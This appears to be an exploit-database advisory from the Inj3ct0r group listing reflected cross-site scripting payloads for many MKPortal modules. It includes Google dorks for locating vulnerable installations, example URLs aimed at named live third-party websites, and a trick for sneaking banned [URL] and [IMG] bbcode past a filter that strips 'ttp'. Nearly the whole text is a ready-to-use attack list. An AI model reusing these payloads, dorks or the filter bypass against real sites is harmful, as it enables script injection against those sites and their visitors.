======================================= MKPortal <= global module Vulnerability ======================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com ################################################## Vulnerable products: MKPortal module gbook Exploit Dork: "inurl:index.php?Ind=gbook" ################################################## --------------------------------------------------------------------- 1. Multiple pXSS Vulnerability in the file index.php. Exploit: /index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E /index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E /index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E Example: http://otradnoe.ru.net//index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E http://otradnoe.ru.net//index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E http://otradnoe.ru.net//index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E --------------------------------------------------------------------- 2. Insert prohibited bb-tags [img] and [url] in the message Vulnerability in the file index.php. A vulnerable piece of code: $message = stripslashes($message); $message = preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/i',$no_url,$message); $message = preg_replace('/\[IMG\](.+?)\[\/IMG\]/i',$no_img,$message); $message = str_replace("ttp","", $message); get around restrictions: [UttpRL=htttptp://inj3ct0r.com]inj3ct0r.com[/URL] [IMttpG]htttptps://inj3ct0r.org/image.php?i=1&dateline=[/IMG] ################################################## Vulnerable products: MKPortal module whois Exploit Dork: "inurl:index.php?Ind=whois" ################################################## 1. pXSS Vulnerability in the file index.php. Exploit: /index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E Example: http://kitimedia.com/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E ################################################## Vulnerable products: MKPortal module lenta Exploit Dork: "inurl:index.php?ind=" graber lenta ################################################## 1. Multiple pXSS Vulnerability in the file index.php. Exploit: /index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3E /index.php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3E Example: http://www.nissanclub72.ru/index.php?ind=lentanews&output=%3Cscript%3Ealert(1)%3C/script%3E http://www.nissanclub72.ru/index.php?ind=lentanews&blocks=%3Cscript%3Ealert(1)%3C/script%3E #################################################### Vulnerable products: MKPortal modules metric Exploit #################################################### 1. pXSS ----------------------------- metric Exploit: /metric/?output=%3Cscript%3Ealert(1)%3C/script%3E /metric/?error=%3Cscript%3Ealert(1)%3C/script%3E /metric/?blocks=%3Cscript%3Ealert(1)%3C/script%3E ------------------------------------------ recommend Exploit: /index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E Example: http://www.street-style.su/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E ------------------------------------------ anekdot Exploit: /Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E /Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E /Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E Example: http://www.isranetclub.com/isra/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E http://www.isranetclub.com/isra/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E http://www.isranetclub.com/isra/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E --------------------------- contact Exploit: /contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E /contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E /contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E --------------------------- speed connection Exploit: /speed/?output=%3Cscript%3Ealert(1)%3C/script%3E /speed/?blocks=%3Cscript%3Ealert(1)%3C/script%3E --------------------------- horoscop Exploit: /index.php?ind=horoscop&blocks=%3Cscript%3Ealert(1)%3C/script%3E /index.php?ind=horoscop&output=%3Cscript%3Ealert(1)%3C/script%3E ---------------------------- phones Exploit: /catphones/index.php?output=%3Cscript%3Ealert(1)%3C/script%3E /catphones/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E In general, the vulnerability exists because of stupidity. the code is a variable that is formed during the execution of the script and she gradually appropriated the additional data. In the vulnerable code modules approximately as follows: This XSS extended to 90% of the modules for MKPortal from rusmkportal.ru =] ---------------------------------------------- ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]